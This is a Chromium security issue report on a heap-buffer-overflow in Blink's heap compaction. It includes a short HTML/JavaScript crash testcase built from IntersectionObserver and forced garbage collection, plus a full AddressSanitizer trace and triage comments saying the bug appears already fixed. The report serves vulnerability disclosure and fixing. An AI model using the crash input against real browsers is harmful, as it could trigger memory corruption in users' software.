Issue metadata
Sign in to add a comment
|
Security: heap-buffer-overflow in blink::HeapCompact::MovableObjectFixups::Relocate
Reported by
cloudfuz...@gmail.com,
Aug 1
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of content_shell. It requires the --js-flags=--expose-gc command line flag.
VERSION
Chrome Version: asan-linux-release-579380
Operating System: Linux 64bit
REPRODUCTION CASE
<script>
function start () {
o34=document.createElementNS('http://www.w3.org/1999/xhtml','div');
o34.innerHTML='<svg><clipPath><ellipse><animate><circle><circle>';
o35=o34.firstChild.getElementsByTagName('*');
o37=o35[4];
o202=document.createElementNS('http://www.w3.org/2000/svg','feMergeNode');
o266=new IntersectionObserver(fun0,{root: o37,rootMargin: '524288px 1px -1441792px 11px'});
gc();
o266.observe(o202);
window.setTimeout(fun0,4);
}
function fun0() {
o37=null;
o35=null;
o34=null
gc();
location.reload();
}
</script>
<body onload="start()"></body>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:
=================================================================
==24817==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100017d108 at pc 0x000007dc1268 bp 0x7fff37afccf0 sp 0x7fff37afcce8
READ of size 8 at 0x62100017d108 thread T0 (content_shell)
#0 0x7dc1267 in blink::HeapCompact::MovableObjectFixups::Relocate(unsigned char*, unsigned char*) third_party/blink/renderer/platform/heap/heap_compact.cc:164:70
#1 0x7dcd2b5 in blink::NormalPage::SweepAndCompact(blink::NormalPage::CompactionContext&) third_party/blink/renderer/platform/heap/heap_page.cc:1472:16
#2 0x7dcc78a in blink::NormalPageArena::SweepAndCompact() third_party/blink/renderer/platform/heap/heap_page.cc:514:18
#3 0x7db1f74 in blink::ThreadHeap::Compact() third_party/blink/renderer/platform/heap/heap.cc:385:48
#4 0x7defe4d in blink::ThreadState::AtomicPauseEpilogue(blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType) third_party/blink/renderer/platform/heap/thread_state.cc:1006:12
#5 0x7df37f3 in blink::ThreadState::RunAtomicPause(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1594:5
#6 0x7de2f9c in blink::ThreadState::CollectGarbage(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1537:5
#7 0x7deef38 in CollectAllGarbage third_party/blink/renderer/platform/heap/thread_state.cc:1756:5
#8 0x7deef38 in blink::ThreadState::RunScheduledGC(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:929
#9 0x7df13a3 in blink::ThreadState::SafePoint(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:1234:3
#10 0x107fe822 in blink::GCTaskObserver::DidProcessTask() third_party/blink/renderer/platform/heap/gc_task_runner.h:63:29
#11 0xacf73b6 in base::sequence_manager::internal::SequenceManagerImpl::NotifyDidProcessTask(base::sequence_manager::internal::SequenceManagerImpl::ExecutingTask*, base::sequence_manager::LazyNow*) base/task/sequence_manager/sequence_manager_impl.cc:552:16
#12 0xacf6bb5 in base::sequence_manager::internal::SequenceManagerImpl::DidRunTask() base/task/sequence_manager/sequence_manager_impl.cc:414:3
#13 0xad17fa4 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:174:16
#14 0xac31cac in Run base/callback.h:99:12
#15 0xac31cac in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#16 0xac2c284 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:432:46
#17 0xac2d73c in DeferOrRunPendingTask base/message_loop/message_loop.cc:443:5
#18 0xac2d73c in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:515
#19 0xac363cf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#20 0xaca442b in base::RunLoop::Run() base/run_loop.cc:102:14
#21 0x17c1319a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#22 0x83db7dd in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:554:14
#23 0x83dfaaa in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:951:10
#24 0xfb75a89 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#25 0x5c3330e in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#26 0x355b3c7 in main content/shell/app/shell_main.cc:39:10
#27 0x7fd8f7dd02e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
0x62100017d108 is located 8 bytes to the right of 4096-byte region [0x62100017c100,0x62100017d100)
allocated by thread T0 (content_shell) here:
#0 0x352bd23 in __interceptor_malloc /b/swarming/w/ir/kitchen-workdir/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
#1 0xfc0b772 in PartitionAllocGenericFlags base/allocator/partition_allocator/partition_alloc.h:321:18
#2 0xfc0b772 in Alloc base/allocator/partition_allocator/partition_alloc.h:341
#3 0xfc0b772 in BufferMalloc third_party/blink/renderer/platform/wtf/allocator/partitions.h:97
#4 0xfc0b772 in WTF::PartitionAllocator::AllocateBacking(unsigned long, char const*) third_party/blink/renderer/platform/wtf/allocator/partition_allocator.cc:13
#5 0x7dc5a50 in AllocateZeroedHashTableBacking<WTF::KeyValuePair<void *, void **>, WTF::HashTable<void *, WTF::KeyValuePair<void *, void **>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void *>, WTF::HashTraits<void **> >, WTF::HashTraits<void *>, WTF::PartitionAllocator> > third_party/blink/renderer/platform/wtf/allocator/partition_allocator.h:81:20
#6 0x7dc5a50 in AllocateTable third_party/blink/renderer/platform/wtf/hash_table.h:1622
#7 0x7dc5a50 in Rehash third_party/blink/renderer/platform/wtf/hash_table.h:1843
#8 0x7dc5a50 in WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>::Expand(WTF::KeyValuePair<void*, void**>*) third_party/blink/renderer/platform/wtf/hash_table.h:1694
#9 0x7dc5622 in WTF::HashTableAddResult<WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>, WTF::KeyValuePair<void*, void**> > WTF::HashTable<void*, WTF::KeyValuePair<void*, void**>, WTF::KeyValuePairKeyExtractor, WTF::PtrHash<void>, WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::HashTraits<void*>, WTF::PartitionAllocator>::insert<WTF::HashMapTranslator<WTF::HashMapValueTraits<WTF::HashTraits<void*>, WTF::HashTraits<void**> >, WTF::PtrHash<void>, WTF::PartitionAllocator>, void*&, void**&>(void*&&&, void**&&&) third_party/blink/renderer/platform/wtf/hash_table.h:1351:13
#10 0x7dc18de in InlineAdd<void *&, void **&> third_party/blink/renderer/platform/wtf/hash_map.h:530:25
#11 0x7dc18de in insert<void *&, void **&> third_party/blink/renderer/platform/wtf/hash_map.h:588
#12 0x7dc18de in blink::HeapCompact::MovableObjectFixups::Add(void**) third_party/blink/renderer/platform/heap/heap_compact.cc:81
#13 0x7dc155e in blink::HeapCompact::StartThreadCompaction() third_party/blink/renderer/platform/heap/heap_compact.cc:430:16
#14 0x7db1f4b in blink::ThreadHeap::Compact() third_party/blink/renderer/platform/heap/heap.cc:382:17
#15 0x7defe4d in blink::ThreadState::AtomicPauseEpilogue(blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType) third_party/blink/renderer/platform/heap/thread_state.cc:1006:12
#16 0x7df37f3 in blink::ThreadState::RunAtomicPause(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1594:5
#17 0x7de2f9c in blink::ThreadState::CollectGarbage(blink::BlinkGC::StackState, blink::BlinkGC::MarkingType, blink::BlinkGC::SweepingType, blink::BlinkGC::GCReason) third_party/blink/renderer/platform/heap/thread_state.cc:1537:5
#18 0x7deef38 in CollectAllGarbage third_party/blink/renderer/platform/heap/thread_state.cc:1756:5
#19 0x7deef38 in blink::ThreadState::RunScheduledGC(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:929
#20 0x7df13a3 in blink::ThreadState::SafePoint(blink::BlinkGC::StackState) third_party/blink/renderer/platform/heap/thread_state.cc:1234:3
#21 0x107fe822 in blink::GCTaskObserver::DidProcessTask() third_party/blink/renderer/platform/heap/gc_task_runner.h:63:29
#22 0xacf73b6 in base::sequence_manager::internal::SequenceManagerImpl::NotifyDidProcessTask(base::sequence_manager::internal::SequenceManagerImpl::ExecutingTask*, base::sequence_manager::LazyNow*) base/task/sequence_manager/sequence_manager_impl.cc:552:16
#23 0xacf6bb5 in base::sequence_manager::internal::SequenceManagerImpl::DidRunTask() base/task/sequence_manager/sequence_manager_impl.cc:414:3
#24 0xad17fa4 in base::sequence_manager::internal::ThreadControllerImpl::DoWork(base::sequence_manager::internal::ThreadControllerImpl::WorkType) base/task/sequence_manager/thread_controller_impl.cc:174:16
#25 0xac31cac in Run base/callback.h:99:12
#26 0xac31cac in base::debug::TaskAnnotator::RunTask(char const*, base::PendingTask*) base/debug/task_annotator.cc:101
#27 0xac2c284 in base::MessageLoop::RunTask(base::PendingTask*) base/message_loop/message_loop.cc:432:46
#28 0xac2d73c in DeferOrRunPendingTask base/message_loop/message_loop.cc:443:5
#29 0xac2d73c in base::MessageLoop::DoWork() base/message_loop/message_loop.cc:515
#30 0xac363cf in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) base/message_loop/message_pump_default.cc:37:31
#31 0xaca442b in base::RunLoop::Run() base/run_loop.cc:102:14
#32 0x17c1319a in content::RendererMain(content::MainFunctionParams const&) content/renderer/renderer_main.cc:200:23
#33 0x83db7dd in content::RunZygote(content::ContentMainDelegate*) content/app/content_main_runner_impl.cc:554:14
#34 0x83dfaaa in content::ContentMainRunnerImpl::Run(bool) content/app/content_main_runner_impl.cc:951:10
#35 0xfb75a89 in service_manager::Main(service_manager::MainParams const&) services/service_manager/embedder/main.cc:472:29
#36 0x5c3330e in content::ContentMain(content::ContentMainParams const&) content/app/content_main.cc:19:10
#37 0x355b3c7 in main content/shell/app/shell_main.cc:39:10
#38 0x7fd8f7dd02e0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202e0)
SUMMARY: AddressSanitizer: heap-buffer-overflow third_party/blink/renderer/platform/heap/heap_compact.cc:164:70 in blink::HeapCompact::MovableObjectFixups::Relocate(unsigned char*, unsigned char*)
Shadow bytes around the buggy address:
0x0c42800279d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c42800279e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c42800279f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4280027a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c4280027a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4280027a20: fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c4280027a70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==24817==ABORTING
,
Aug 1
Testcase 5137962954915840 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=5137962954915840.
,
Aug 2
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6601307335688192.
,
Aug 2
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://clusterfuzz.com/testcase?key=6534855601684480.
,
Aug 2
Testcase 6534855601684480 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=6534855601684480.
,
Aug 2
Thanks for your report. I can reproduce the crash on the revision you've mentioned, but not on the most recent one, e.g.: https://storage.cloud.google.com/chromium-browser-asan/linux-release/asan-linux-release-580151.zip Likely it's been already fixed as issue 869301.
,
Nov 8
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by ClusterFuzz
, Aug 1